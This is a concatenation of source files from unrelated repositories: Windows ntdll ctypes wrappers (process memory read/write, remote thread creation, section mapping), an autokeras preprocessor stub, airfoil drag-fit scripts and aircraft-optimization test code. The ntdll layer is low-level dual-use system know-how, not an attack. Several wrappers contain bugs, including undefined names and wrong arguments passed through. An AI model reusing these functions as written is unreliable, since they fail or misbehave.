thread_entry = THREADENTRY32()
thread_entry.dwSize = ctypes.sizeof(thread_entry)
threads = []
winproxy.Thread32First(snap, thread_entry)
parent = proc_dict[thread_entry.th32OwnerProcessID]
threads.append(process.WinThread._from_THREADENTRY32(thread_entry, owner=parent))
while winproxy.Thread32Next(snap, thread_entry):
parent = proc_dict[thread_entry.th32OwnerProcessID]
threads.append(process.WinThread._from_THREADENTRY32(thread_entry, owner=parent))
winproxy.CloseHandle(snap)
return threads
```
#### File: winproxy/apis/ntdll.py
```python
import ctypes
import windows.generated_def as gdef
from ..apiproxy import ApiProxy, NeededParameter
from ..error import WinproxyError, result_is_ntstatus, fail_on_zero
class NtdllProxy(ApiProxy):
APIDLL = "ntdll"
default_error_check = staticmethod(result_is_ntstatus)
# Memory
@NtdllProxy()
def NtReadVirtualMemory(hProcess, lpBaseAddress, lpBuffer, nSize, lpNumberOfBytesRead):
return NtReadVirtualMemory.ctypes_function(hProcess, lpBaseAddress, lpBuffer, nSize, lpNumberOfBytesRead)
@NtdllProxy()
def NtWriteVirtualMemory(ProcessHandle, BaseAddress, Buffer, NumberOfBytesToWrite, NumberOfBytesWritten):
return NtWriteVirtualMemory.ctypes_function(ProcessHandle, BaseAddress, Buffer, NumberOfBytesToWrite, NumberOfBytesWritten)
# Wow64
@NtdllProxy()
def NtWow64ReadVirtualMemory64(hProcess, lpBaseAddress, lpBuffer, nSize, lpNumberOfBytesRead=None):
return NtWow64ReadVirtualMemory64.ctypes_function(hProcess, lpBaseAddress, lpBuffer, nSize, lpNumberOfBytesRead)
@NtdllProxy()
def NtWow64WriteVirtualMemory64(hProcess, lpBaseAddress, lpBuffer, nSize, lpNumberOfBytesWritten=None):
return NtWow64WriteVirtualMemory64.ctypes_function(hProcess, lpBaseAddress, lpBuffer, nSize, lpNumberOfBytesWritten)
# File
@NtdllProxy()
def NtCreateFile(FileHandle, DesiredAccess, ObjectAttributes, IoStatusBlock, AllocationSize, FileAttributes, ShareAccess, CreateDisposition, CreateOptions, EaBuffer, EaLength):
return NtCreateFile.ctypes_function(FileHandle, DesiredAccess, ObjectAttributes, IoStatusBlock, AllocationSize, FileAttributes, ShareAccess, CreateDisposition, CreateOptions, EaBuffer, EaLength)
@NtdllProxy()
def NtSetInformationFile(FileHandle, IoStatusBlock, FileInformation, Length, FileInformationClass):
return NtSetInformationFile.ctypes_function(FileHandle, IoStatusBlock, FileInformation, Length, FileInformationClass)
@NtdllProxy()
def NtQueryInformationFile(FileHandle, IoStatusBlock, FileInformation, Length=None, FileInformationClass=NeededParameter):
if Length is None:
Length = ctypes.sizeof(FileInformation)
return NtQueryInformationFile.ctypes_function(FileHandle, IoStatusBlock, FileInformation, Length, FileInformationClass)
@NtdllProxy()
def NtQueryDirectoryFile(FileHandle, Event=None, ApcRoutine=None, ApcContext=None, IoStatusBlock=NeededParameter, FileInformation=NeededParameter, Length=None, FileInformationClass=NeededParameter, ReturnSingleEntry=NeededParameter, FileName=None, RestartScan=NeededParameter):
if Length is None:
Length = ctypes.sizeof(FileInformation)
return NtQueryDirectoryFile.ctypes_function(FileHandle, Event, ApcRoutine, ApcContext, IoStatusBlock, FileInformation, Length, FileInformationClass, ReturnSingleEntry, FileName, RestartScan)
@NtdllProxy()
def NtQueryVolumeInformationFile(FileHandle, IoStatusBlock, FsInformation, Length=None, FsInformationClass=NeededParameter):
if Length is None:
Length = ctypes.sizeof(FsInformation)
return NtQueryVolumeInformationFile.ctypes_function(FileHandle, IoStatusBlock, FsInformation, Length, FsInformationClass)
@NtdllProxy()
def NtQueryEaFile(FileHandle, IoStatusBlock, Buffer, Length, ReturnSingleEntry, EaList, EaListLength, EaIndex, RestartScan):
return NtQueryEaFile.ctypes_function(FileHandle, IoStatusBlock, Buffer, Length, ReturnSingleEntry, EaList, EaListLength, EaIndex, RestartScan)
@NtdllProxy()
def NtSetEaFile(FileHandle, IoStatusBlock, Buffer, Length):
return NtSetEaFile.ctypes_function(FileHandle, IoStatusBlock, Buffer, Length)
# Process
@NtdllProxy()
def NtQueryInformationProcess(ProcessHandle, ProcessInformationClass, ProcessInformation, ProcessInformationLength=0, ReturnLength=None):
if ProcessInformation is not None and ProcessInformationLength == 0:
ProcessInformationLength = ctypes.sizeof(ProcessInformation)
if type(ProcessInformation) == gdef.PROCESS_BASIC_INFORMATION:
ProcessInformation = ctypes.byref(ProcessInformation)
if ReturnLength is None:
ReturnLength = ctypes.byref(gdef.ULONG())
return NtQueryInformationProcess.ctypes_function(ProcessHandle, ProcessInformationClass, ProcessInformation, ProcessInformationLength, ReturnLength)
@NtdllProxy()
def NtSetInformationProcess(ProcessHandle, ProcessInformationClass, ProcessInformation, ProcessInformationLength=0):
if not ProcessInformationLength:
ProcessInformationLength = ctypes.sizeof(ProcessInformation)
return NtSetInformationProcess.ctypes_function(ProcessHandle, ProcessInformationClass, ProcessInformation, ProcessInformationLength)
@NtdllProxy()
def LdrLoadDll(PathToFile, Flags, ModuleFileName, ModuleHandle):
return LdrLoadDll.ctypes_function(PathToFile, Flags, ModuleFileName, ModuleHandle)
@NtdllProxy()
def RtlGetUnloadEventTraceEx(ElementSize, ElementCount, EventTrace):
return RtlGetUnloadEventTraceEx.ctypes_function(ElementSize, ElementCount, EventTrace)
# Thread
@NtdllProxy()
def NtGetContextThread(hThread, lpContext):
return NtGetContextThread.ctypes_function(hThread, lpContext)
@NtdllProxy()
def NtQueryInformationThread(ThreadHandle, ThreadInformationClass, ThreadInformation, ThreadInformationLength=0, ReturnLength=None):
if ReturnLength is None:
ReturnLength = ctypes.byref(gdef.ULONG())
if ThreadInformation is not None and ThreadInformationLength == 0:
ThreadInformationLength = ctypes.sizeof(ThreadInformation)
return NtQueryInformationThread.ctypes_function(ThreadHandle, ThreadInformationClass, ThreadInformation, ThreadInformationLength, ReturnLength)
@NtdllProxy()
def NtCreateProcessEx(ProcessHandle, DesiredAccess, ObjectAttributes=None, ParentProcess=NeededParameter, Flags=NeededParameter, SectionHandle=NeededParameter, DebugPort=None, ExceptionPort=None, InJob=False):
return NtCreateProcessEx.ctypes_function(ProcessHandle, DesiredAccess, ObjectAttributes, ParentProcess, Flags, SectionHandle, DebugPort, ExceptionPort, InJob)
@NtdllProxy()
def NtCreateThreadEx(ThreadHandle=None, DesiredAccess=0x1fffff, ObjectAttributes=0, ProcessHandle=NeededParameter, lpStartAddress=NeededParameter, lpParameter=NeededParameter, CreateSuspended=0, dwStackSize=0, Unknown1=0, Unknown2=0, Unknown=0):
if ThreadHandle is None:
ThreadHandle = ctypes.byref(gdef.HANDLE())
return NtCreateThreadEx.ctypes_function(ThreadHandle, DesiredAccess, ObjectAttributes, ProcessHandle, lpStartAddress, lpParameter, CreateSuspended, dwStackSize, Unknown1, Unknown2, Unknown3)
@NtdllProxy()
def NtSetContextThread(hThread, lpContext):
return NtSetContextThread.ctypes_function(hThread, lpContext)
# Memory
@NtdllProxy()
def NtAllocateVirtualMemory(ProcessHandle, BaseAddress, ZeroBits, RegionSize, AllocationType, Protect):
return NtAllocateVirtualMemory.ctypes_function(ProcessHandle, BaseAddress, ZeroBits, RegionSize, AllocationType, Protect)
@NtdllProxy()
def NtFreeVirtualMemory(ProcessHandle, BaseAddress, RegionSize, FreeType):
return NtFreeVirtualMemory.ctypes_function(ProcessHandle, BaseAddress, RegionSize, FreeType)
@NtdllProxy()
def NtProtectVirtualMemory(ProcessHandle, BaseAddress, NumberOfBytesToProtect, NewAccessProtection, OldAccessProtection=None):
if OldAccessProtection is None:
OldAccessProtection = gdef.DWORD()
return NtProtectVirtualMemory.ctypes_function(ProcessHandle, BaseAddress, NumberOfBytesToProtect, NewAccessProtection, OldAccessProtection)
@NtdllProxy()
def NtQueryVirtualMemory(ProcessHandle, BaseAddress, MemoryInformationClass, MemoryInformation=NeededParameter, MemoryInformationLength=0, ReturnLength=None):
if ReturnLength is None:
ReturnLength = ctypes.byref(gdef.ULONG())
if MemoryInformation is not None and MemoryInformationLength == 0:
ProcessInformationLength = ctypes.sizeof(MemoryInformation)
if type(MemoryInformation) == gdef.MEMORY_BASIC_INFORMATION64:
MemoryInformation = ctypes.byref(MemoryInformation)
return NtQueryVirtualMemory.ctypes_function(ProcessHandle, BaseAddress, MemoryInformationClass, MemoryInformation=NeededParameter, MemoryInformationLength=0, ReturnLength=None)
# System
def ntquerysysteminformation_error_check(func_name, result, func, args):
if result == 0:
return args
# Ignore STATUS_INFO_LENGTH_MISMATCH if SystemInformation is None
if result == gdef.STATUS_INFO_LENGTH_MISMATCH and args[1] is None:
return args
raise WinproxyError("{0} failed with NTStatus {1}".format(func_name, hex(result)))
@NtdllProxy(error_check=ntquerysysteminformation_error_check)
def NtQuerySystemInformation(SystemInformationClass, SystemInformation=None, SystemInformationLength=0, ReturnLength=NeededParameter):
if SystemInformation is not None and SystemInformationLength == 0:
SystemInformationLength = ctypes.sizeof(SystemInformation)
return NtQuerySystemInformation.ctypes_function(SystemInformationClass, SystemInformation, SystemInformationLength, ReturnLength)
# path
@NtdllProxy(error_check=fail_on_zero)
def RtlDosPathNameToNtPathName_U(DosName, NtName=None, PartName=None, RelativeName=None):
return RtlDosPathNameToNtPathName_U.ctypes_function(DosName, NtName, PartName, RelativeName)
# kernel Object
@NtdllProxy()
def NtQueryObject(Handle, ObjectInformationClass, ObjectInformation=None, ObjectInformationLength=0, ReturnLength=NeededParameter):
return NtQueryObject.ctypes_function(Handle, ObjectInformationClass, ObjectInformation, ObjectInformationLength, ReturnLength)
@NtdllProxy()
def NtOpenDirectoryObject(DirectoryHandle, DesiredAccess, ObjectAttributes):
return NtOpenDirectoryObject.ctypes_function(DirectoryHandle, DesiredAccess, ObjectAttributes)
@NtdllProxy()
def NtQueryDirectoryObject(DirectoryHandle, Buffer, Length, ReturnSingleEntry, RestartScan, Context, ReturnLength):
return NtQueryDirectoryObject.ctypes_function(DirectoryHandle, Buffer, Length, ReturnSingleEntry, RestartScan, Context, ReturnLength)
@NtdllProxy()
def NtQuerySymbolicLinkObject(LinkHandle, LinkTarget, ReturnedLength):
return NtQuerySymbolicLinkObject.ctypes_function(LinkHandle, LinkTarget, ReturnedLength)
@NtdllProxy()
def NtOpenSymbolicLinkObject(LinkHandle, DesiredAccess, ObjectAttributes):
return NtOpenSymbolicLinkObject.ctypes_function(LinkHandle, DesiredAccess, ObjectAttributes)
# Event
@NtdllProxy()
def NtOpenEvent(EventHandle, DesiredAccess, ObjectAttributes):
return NtOpenEvent.ctypes_function(EventHandle, DesiredAccess, ObjectAttributes)
# ALPC
@NtdllProxy()
def NtAlpcCreatePort(PortHandle, ObjectAttributes, PortAttributes):
return NtAlpcCreatePort.ctypes_function(PortHandle, ObjectAttributes, PortAttributes)
@NtdllProxy()
def NtAlpcConnectPort(PortHandle, PortName, ObjectAttributes, PortAttributes, Flags, RequiredServerSid, ConnectionMessage, BufferLength, OutMessageAttributes, InMessageAttributes, Timeout):
return NtAlpcConnectPort.ctypes_function(PortHandle, PortName, ObjectAttributes, PortAttributes, Flags, RequiredServerSid, ConnectionMessage, BufferLength, OutMessageAttributes, InMessageAttributes, Timeout)
@NtdllProxy()
def NtAlpcConnectPortEx(PortHandle, ConnectionPortObjectAttributes, ClientPortObjectAttributes, PortAttributes, Flags, ServerSecurityRequirements, ConnectionMessage, BufferLength, OutMessageAttributes, InMessageAttributes, Timeout):
return NtAlpcConnectPortEx.ctypes_function(PortHandle, ConnectionPortObjectAttributes, ClientPortObjectAttributes, PortAttributes, Flags, ServerSecurityRequirements, ConnectionMessage, BufferLength, OutMessageAttributes, InMessageAttributes, Timeout)
@NtdllProxy()
def NtAlpcAcceptConnectPort(PortHandle, ConnectionPortHandle, Flags, ObjectAttributes, PortAttributes, PortContext, ConnectionRequest, ConnectionMessageAttributes, AcceptConnection):
return NtAlpcAcceptConnectPort.ctypes_function(PortHandle, ConnectionPortHandle, Flags, ObjectAttributes, PortAttributes, PortContext, ConnectionRequest, ConnectionMessageAttributes, AcceptConnection)
@NtdllProxy()
def NtAlpcQueryInformation(PortHandle, PortInformationClass, PortInformation, Length, ReturnLength):
return NtAlpcQueryInformation.ctypes_function(PortHandle, PortInformationClass, PortInformation, Length, ReturnLength)
@NtdllProxy()
def NtAlpcDisconnectPort(PortHandle, Flags):
return NtAlpcDisconnectPort.ctypes_function(PortHandle, Flags)
@NtdllProxy()
def NtAlpcSendWaitReceivePort(PortHandle, Flags, SendMessage, SendMessageAttributes, ReceiveMessage, BufferLength, ReceiveMessageAttributes, Timeout):
return NtAlpcSendWaitReceivePort.ctypes_function(PortHandle, Flags, SendMessage, SendMessageAttributes, ReceiveMessage, BufferLength, ReceiveMessageAttributes, Timeout)
@NtdllProxy()
def AlpcInitializeMessageAttribute(AttributeFlags, Buffer, BufferSize, RequiredBufferSize):
return AlpcInitializeMessageAttribute.ctypes_function(AttributeFlags, Buffer, BufferSize, RequiredBufferSize)
@NtdllProxy()
def AlpcGetMessageAttribute(Buffer, AttributeFlag):
return AlpcGetMessageAttribute.ctypes_function(Buffer, AttributeFlag)
@NtdllProxy()
def NtAlpcCreatePortSection(PortHandle, Flags, SectionHandle, SectionSize, AlpcSectionHandle, ActualSectionSize):
return NtAlpcCreatePortSection.ctypes_function(PortHandle, Flags, SectionHandle, SectionSize, AlpcSectionHandle, ActualSectionSize)
@NtdllProxy()
def NtAlpcDeletePortSection(PortHandle, Flags, SectionHandle):
return NtAlpcDeletePortSection.ctypes_function(PortHandle, Flags, SectionHandle)
@NtdllProxy()
def NtAlpcCreateSectionView(PortHandle, Flags, ViewAttributes):
return NtAlpcCreateSectionView.ctypes_function(PortHandle, Flags, ViewAttributes)
@NtdllProxy()
def NtAlpcDeleteSectionView(PortHandle, Flags, ViewBase):
return NtAlpcDeleteSectionView.ctypes_function(PortHandle, Flags, ViewBase)
@NtdllProxy()
def NtAlpcQueryInformationMessage(PortHandle, PortMessage, MessageInformationClass, MessageInformation, Length, ReturnLength):
return NtAlpcQueryInformationMessage.ctypes_function(PortHandle, PortMessage, MessageInformationClass, MessageInformation, Length, ReturnLength)
@NtdllProxy()
def TpCallbackSendAlpcMessageOnCompletion(TpHandle, PortHandle, Flags, SendMessage):
return TpCallbackSendAlpcMessageOnCompletion.ctypes_function(TpHandle, PortHandle, Flags, SendMessage)
# Compression
@NtdllProxy()
def RtlDecompressBuffer(CompressionFormat, UncompressedBuffer, UncompressedBufferSize, CompressedBuffer, CompressedBufferSize=None, FinalUncompressedSize=NeededParameter):
if CompressedBufferSize is None:
CompressedBufferSize = len(CompressedBuffer)
return RtlDecompressBuffer.ctypes_function(CompressionFormat, UncompressedBuffer, UncompressedBufferSize, CompressedBuffer, CompressedBufferSize, FinalUncompressedSize)
@NtdllProxy()
def RtlDecompressBufferEx(CompressionFormat, UncompressedBuffer, UncompressedBufferSize, CompressedBuffer, CompressedBufferSize=None, FinalUncompressedSize=NeededParameter, WorkSpace=NeededParameter):
if CompressedBufferSize is None:
CompressedBufferSize = len(CompressedBuffer)
# TODO: automatic 'WorkSpace' size calc + allocation ?
return RtlDecompressBufferEx.ctypes_function(CompressionFormat, UncompressedBuffer, UncompressedBufferSize, CompressedBuffer, CompressedBufferSize, FinalUncompressedSize, WorkSpace)
@NtdllProxy()
def RtlGetCompressionWorkSpaceSize(CompressionFormatAndEngine, CompressBufferWorkSpaceSize, CompressFragmentWorkSpaceSize):
return RtlGetCompressionWorkSpaceSize.ctypes_function(CompressionFormatAndEngine, CompressBufferWorkSpaceSize, CompressFragmentWorkSpaceSize)
# Section
@NtdllProxy()
def NtCreateSection(SectionHandle, DesiredAccess, ObjectAttributes, MaximumSize, SectionPageProtection, AllocationAttributes, FileHandle):
return NtCreateSection.ctypes_function(SectionHandle, DesiredAccess, ObjectAttributes, MaximumSize, SectionPageProtection, AllocationAttributes, FileHandle)
@NtdllProxy()
def NtOpenSection(SectionHandle, DesiredAccess, ObjectAttributes):
return NtOpenSection.ctypes_function(SectionHandle, DesiredAccess, ObjectAttributes)
@NtdllProxy()
def NtMapViewOfSection(SectionHandle, ProcessHandle, BaseAddress, ZeroBits, CommitSize, SectionOffset, ViewSize, InheritDisposition, AllocationType, Win32Protect):
return NtMapViewOfSection.ctypes_function(SectionHandle, ProcessHandle, BaseAddress, ZeroBits, CommitSize, SectionOffset, ViewSize, InheritDisposition, AllocationType, Win32Protect)
@NtdllProxy()
def NtUnmapViewOfSection(ProcessHandle, BaseAddress):
return NtUnmapViewOfSection.ctypes_function(ProcessHandle, BaseAddress)
# Registry
@NtdllProxy()
def NtOpenKey(KeyHandle, DesiredAccess, ObjectAttributes):
return NtOpenKey.ctypes_function(KeyHandle, DesiredAccess, ObjectAttributes)
@NtdllProxy()
def NtCreateKey(pKeyHandle, DesiredAccess, ObjectAttributes, TitleIndex, Class, CreateOptions, Disposition):
return NtCreateKey.ctypes_function(pKeyHandle, DesiredAccess, ObjectAttributes, TitleIndex, Class, CreateOptions, Disposition)
@NtdllProxy()
def NtSetValueKey(KeyHandle, ValueName, TitleIndex, Type, Data, DataSize):
return NtSetValueKey.ctypes_function(KeyHandle, ValueName, TitleIndex, Type, Data, DataSize)
@NtdllProxy()
def NtQueryValueKey(KeyHandle, ValueName, KeyValueInformationClass, KeyValueInformation, Length, ResultLength):
return NtQueryValueKey.ctypes_function(KeyHandle, ValueName, KeyValueInformationClass, KeyValueInformation, Length, ResultLength)
@NtdllProxy()
def NtEnumerateValueKey(KeyHandle, Index, KeyValueInformationClass, KeyValueInformation, Length, ResultLength):
return NtEnumerateValueKey.ctypes_function(KeyHandle, Index, KeyValueInformationClass, KeyValueInformation, Length, ResultLength)
@NtdllProxy()
def NtQueryLicenseValue(Name, Type, Buffer, Length=None, DataLength=NeededParameter):
if Length is None and Buffer:
Length = len(buffer)
return NtQueryLicenseValue.ctypes_function(Name, Type, Buffer, Length, DataLength)
# Other
@NtdllProxy()
def RtlEqualUnicodeString(String1, String2, CaseInSensitive):
return RtlEqualUnicodeString.ctypes_function(String1, String2, CaseInSensitive)
# Firmware
@NtdllProxy()
def NtEnumerateSystemEnvironmentValuesEx(InformationClass, Buffer, BufferLength):
return NtEnumerateSystemEnvironmentValuesEx.ctypes_function(InformationClass, Buffer, BufferLength)
#########
``` |
{
"source": "1orwell/yrs2013",
"score": 3
} |
#### File: yrs2013/groups/generate_fake_groups.py
```python
from groups import *
import random
def gen(num_students):
num_teachers = num_students/10
class_size = 20
friendship_group_size = 10
period_list = []
friendship_group_list = []
#make classes
for p in range(6):
class_list = []
#make students
s=range(num_students)
#make teachers
t=range(num_students,(num_students+num_teachers))
for c in range(0,num_students,class_size):
g = Group()
for n in range(class_size):
student = random.choice(s)
s.remove(student)
g.members.append(student)
for n in range(2):
teacher = random.choice(t)
t.remove(teacher)
g.teachers.append(teacher)
class_list.append(g)
period_list.append(class_list)
#make friends (daw)
s = range(num_students)
for f in range(0,num_students,friendship_group_size):
g = Group()
for n in range(friendship_group_size):
friend = random.choice(s)
s.remove(friend)
g.members.append(friend)
friendship_group_list.append(g)
return period_list,friendship_group_list
``` |
{
"source": "1over/autokeras",
"score": 3
} |
#### File: autokeras/engine/preprocessor.py
```python
from autokeras.engine import serializable
class Preprocessor(serializable.Serializable):
"""A preprocessor for tf.data.Dataset.
A preprocessor transforms the dataset using `tf.data` operations.
"""
def fit(self, dataset):
"""Fit the preprocessor with the dataset.
# Arguments
dataset: an instance of `tf.data.Dataset`.
"""
# TODO: may need to change to a streaming way of fit to reduce the
# number of iterations through the dataset for speed. Need to be
# decided when we have more use cases for this fit.
raise NotImplementedError
def transform(self, dataset):
"""Transform the dataset wth the preprocessor.
# Arguments
dataset: an instance of `tf.data.Dataset`.
# Returns
The transformed dataset.
"""
raise NotImplementedError
class TargetPreprocessor(Preprocessor):
"""Preprocessor for target data."""
def postprocess(self, dataset):
"""Postprocess the output of the Keras model.
# Arguments
dataset: numpy.ndarray. The corresponding output of the model.
# Returns
numpy.ndarray. The postprocessed data.
"""
raise NotImplementedError
``` |
{
"source": "1ozturkbe/OCTHaGOn.jl",
"score": 3
} |
#### File: data/airfoil/airfoil_fits.py
```python
"TASOPT c series airfoil fits"
from __future__ import print_function
from builtins import zip
from builtins import range
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from gpfit.fit import fit
plt.rcParams.update({'font.size':15})
def text_to_df(filename):
"parse XFOIL polars and concatente data in DataFrame"
lines = list(open(filename))
for i, l in enumerate(lines):
lines[i] = l.split("\n")[0]
for j in 10-np.arange(9):
if " "*j in lines[i]:
lines[i] = lines[i].replace(" "*j, " ")
if "---" in lines[i]:
start = i
data = {}
titles = lines[start-1].split(" ")[1:]
for t in titles:
data[t] = []
for l in lines[start+1:]:
for i, v in enumerate(l.split(" ")[1:]):
data[titles[i]].append(v)
df = pd.DataFrame(data)
df = df.astype(float)
return df
def fit_setup(thick_range, re_range, M_range):
"set up x and y parameters for gp fitting"
cd = []
tau = []
mach = []
re = []
cl = []
for m in M_range:
for n in thick_range:
for r in re_range:
dataf = text_to_df("blade_data/blade.c%s.Re%dk.M%s.pol" % (n, r, m))
for i in range(len(dataf["CD"])):
if dataf["CD"][i] and dataf["CL"][i] != 0:
cd.append(dataf["CD"][i])
cl.append(dataf["CL"][i])
re.append(r)
tau.append(float(n)/1000)
mach.append(m)
u1 = np.hstack(re)
print(u1)
u2 = np.hstack(tau)
print(u2)
u3 = np.hstack(mach)
u4 = np.hstack(cl)
w = np.hstack(cd)
u1 = u1.astype(np.float)
u2 = u2.astype(np.float)
u3 = u3.astype(np.float)
w = w.astype(np.float)
u = [u1, u2, u3, u4]
x = np.log(u)
y = np.log(w)
return x, y
def make_fit(thick_range, re_range, M_range):
#call the fit setup function
x, y = fit_setup(thick_range, re_range, M_range)
cstrt, rms = fit(x, y, 4, 'SMA')
print("RMS")
print(rms)
return cstrt, rms
if __name__ == "__main__":
Re = list(range(10000, 35000, 5000))
thick = ["100", "110", "120", "130", "140", "145"]
M = [0.4, 0.5, 0.6, 0.7, 0.8, 0.9]
cl = np.linspace(0.35, 0.70, 8)
X, Y = fit_setup(thick, Re, M)
X = np.transpose(X)
np.savetxt('airfoil_X.csv', X, delimiter=',')
np.savetxt('airfoil_Y.csv', Y, delimiter=',')
cstrt, rms = make_fit(thick, Re, M)
```
#### File: python/test/test_constraintify.py
```python
import numpy as np
from gpkit import Variable, Model
from gpkit.small_scripts import mag
from gpfit.fit import fit
import unittest
from gpkitmodels.SP.SimPleAC.SimPleAC_mission import *
from interpretableai import iai
import pickle
from OCTHaGOn.constraint_tree import ConstraintTree
from OCTHaGOn.global_model import GlobalModel
from OCTHaGOn.sample import gen_X
from OCTHaGOn.tools import (find_signomials, prep_SimPleAC,
get_varkeys, get_bounds, \
bound_variables, \
constraint_from_gpfit, HiddenPrints)
from OCTHaGOn.testing.run_tests import run_tests
class TestConstraintify(unittest.TestCase):
def test_monomials_from_pwl_data(self):
pwlDict = {1: [1, [2,3,4]],
2: [5, [6,7,8]],
3: [9, [10,11,12]]}
a = Variable('a')
b = Variable('b')
c = Variable('c')
ivars = [a, b*c**0.35, c]
dvar = a*b
constraintDict = ConstraintTree.pwl_constraintify(pwlDict, dvar, ivars)
test_constr = np.exp(1)*ivars[0]**2*ivars[1]**3*ivars[2]**4 <= dvar
self.assertEqual(test_constr.as_hmapslt1({}),
constraintDict[1][0].as_hmapslt1({}))
def test_ConstraintTree_sp_constraints(self):
"""
Tests ConstraintTree generation from SP constraints
"""
m, basis = prep_SimPleAC()
# Identify signomial constraints
sp_constraints = find_signomials(m)
sp_variables = get_varkeys(sp_constraints)
#TODO: complete
def test_SimPleAC_with_treeconstraints(self):
m, basis = prep_SimPleAC()
basesol = m.localsolve(verbosity=0)
# Now replacing the drag model with a learner...
constraints = [c for c in m.flat()]
del constraints[-12:-8]
lnr = iai.read_json("data/solar_airfoil_lnr.json")
subs = m.substitutions.copy()
for i in range(len(m['C_{D_{wpar}}'])):
basis = {m['Re'][i].key: 1.5e6,
m['\\tau'].key: 0.12}
dvar = m['C_{D_{wpar}}'][i]
ivars = [m['Re'][i],
m['\\tau'],
m['C_L'][i]]
bounds = {
m['Re'][i].key: [5e5,3e6],
m['\\tau'].key: [0.08, 0.23],
m['C_L'][i].key: [0.33, 2.0],
}
ct = ConstraintTree(lnr, dvar, ivars, basis=basis, bounds=bounds)
constraints.append(ct)
gm = GlobalModel(m.cost, constraints, subs)
sol = gm.solve(verbosity=2)
def test_SimPleAC_with_surrogate_tree(self):
m, basis = prep_SimPleAC()
# Replicate GP model with new models
basesol = m.localsolve(verbosity=0)
ivars = [m[var] for var in list(basis.keys())]
dvar = Variable("Total cost", "N", "fuel and time cost")
# Fitting GPfit model
solns = pickle.load(open("data/SimPleAC.sol", "rb"))
subs = pickle.load(open("data/SimPleAC.subs", "rb"))
X = gen_X(subs, basis)
Y = [mag(soln['cost'] / basesol['cost']) for soln in solns]
with HiddenPrints():
cstrt, rms = fit(np.log(np.transpose(X)), np.log(Y), 4, 'SMA')
basis[dvar.key] = basesol['cost']*dvar.units
fit_constraint = constraint_from_gpfit(cstrt, dvar, ivars, basis)
basis.pop(dvar.key)
m = Model(dvar, [fit_constraint], basis)
fitsol = m.solve(verbosity=0, reltol=1e-6)
self.assertAlmostEqual(fitsol['cost']/basesol['cost'], 1, places=2)
# Now with trees
lnr = iai.read_json("data/SimPleAC_lnr.json")
bounds = pickle.load(open("data/SimPleAC.bounds", "rb"))
basis[dvar.key] = basesol['cost']*dvar.units
# Check that bounding constraints are same for the two generation methods
c1 = bound_variables(bounds, m)
c2 = bound_variables(bounds, ivars)
for i in range(len(c1)):
self.assertEqual(c1[i].as_hmapslt1({}), c2[i].as_hmapslt1({}))
ct1 = ConstraintTree(lnr, dvar, ivars, basis=basis, bounds=bounds)
ct2 = ConstraintTree(lnr, dvar, ivars, basis=basis)
# Making sure solutions are identical as well
del basis[dvar.key]
gm1 = GlobalModel(dvar, [ct1], basis)
sol1 = gm1.solve(verbosity=0)
gm2 = GlobalModel(dvar, [ct2, c2], basis)
sol2 = gm2.solve(verbosity=0)
self.assertAlmostEqual(sol1['cost']/basesol['cost'], 1, places=2)
self.assertAlmostEqual(sol1['cost'], sol2['cost'], places=2)
TESTS = [TestConstraintify]
if __name__ == "__main__":
run_tests(TESTS)
```
#### File: OCTHaGOn.jl/python/train.py
```python
import numpy as np
from interpretableai import iai
def train_trees(X, Y, **kwargs):
"""
Wrapper for IAI grid search with optional kwargs.
:param X: feature data
:param Y: class data
:param kwargs: kwargs for learner
:return: A solved gridsearch over the data, where
grid.get_learner() gives the best performing tree.
"""
lnr_kwargs = {'regression_sparsity': 'all',
'fast_num_support_restarts': 3,
'hyperplane_config': [{'sparsity': 1}],
'random_seed': 314}
split_data_kwargs = {'seed': 314,
'train_proportion': 0.5}
grid_kwargs = {'max_depth': [2, 3],
'regression_lambda': [0.001],
'minbucket': [0.05, 0.01]
}
for key, value in kwargs.items():
# Setting learner parameters
if key in ['regression_sparsity', 'hyperplane_config', 'fast_num_support_restarts']:
lnr_kwargs.update({key: value})
elif key in ['regression_lambda', 'max_depth', 'minbucket', 'cp']:
grid_kwargs.update({key:value})
elif key == 'seed':
lnr_kwargs.update({'random_seed': value})
split_data_kwargs.update({key: value})
elif key == 'train_proportion':
split_data_kwargs.update({key, value})
else:
raise ValueError("Kwarg with key %s is invalid." % key)
lnr = iai.OptimalTreeRegressor()
lnr.set_params(**lnr_kwargs)
(train_X, train_Y), (test_X, test_Y) = iai.split_data('regression', X, Y,
**split_data_kwargs)
grid = iai.GridSearch(lnr, **grid_kwargs)
grid.fit(train_X, train_Y, test_X, test_Y)
return grid
``` |
{
"source": "1ozturkbe/robustSPpaper",
"score": 3
} |
#### File: robustSPpaper/code/SimPleAC_objectivetable.py
```python
import csv
import numpy as np
from gpkit import Model, units
from SimPleAC_setup import SimPleAC_setup
from SimPleAC_radar import generate_radar_data, gen_SimPleAC_radar
from SimPleAC_draw import SimPleAC_draw
def objective_table_csv(objectives, data, keyOrder, baseresult):
rawdata = [None] * (len(objectives) + 1)
rawdata[0] = ['Objective'] + [objectives[i]['name'] for i in keyOrder]
count = 0
for i in range(len(keyOrder)):
count += 1
rawdata[count] = [objectives[keyOrder[i]]['name']] + list(np.around(np.divide(np.array(data[count][1][0]),np.array(baseresult)),decimals=2))
with open("savefigs/objective_table.csv",'w') as resultFile:
wr = csv.writer(resultFile, dialect='excel')
for i in range(len(rawdata)):
wr.writerow(rawdata[i])
if __name__ == "__main__":
m, subs = SimPleAC_setup()
# Putting in objectives and associated substitutions
# in a dictionary
objectives = {m['W_{f_m}'] : {'name': 'Total fuel', 'added': {}, 'removed': {}},
m['W_{f_m}']+m['C_m']*m['t_m']*units('N') : {'name': 'Total cost', 'added': {}, 'removed': {}},
m['W'] : {'name': 'Takeoff weight', 'added': {}, 'removed': {}},
1/(m['L'][2]/m['D'][2]) : {'name': '1/(Cruise L/D)', 'added': {}, 'removed': {}},
m['W_e'] : {'name': 'Engine weight', 'added': {}, 'removed': {}},
m['S'] : {'name': 'Wing area', 'added': {}, 'removed': {}},
}
keyOrder = [m['W_{f_m}'], m['W_{f_m}']+m['C_m']*m['t_m']*units('N'), m['W'],
1/(m['L'][2]/m['D'][2]), m['W_e'], m['S']]
models = {}
methods = ['nominal']
baseobj = m['W_{f_m}']
# Adding minimizer so all objectives are tight at the optimum
minimizer = 10**-6 * sum(i/i.units if i.units else i for i in objectives.keys())
# Nominal case must always be first!
marray = [[] for i in range(len(keyOrder))]
for i in range(len(keyOrder)):
try:
nm = Model(keyOrder[i] + minimizer*keyOrder[i].units, m, m.substitutions)
except:
nm = Model(keyOrder[i] + minimizer, m, m.substitutions)
marray[i].append(nm)
# Solving marray
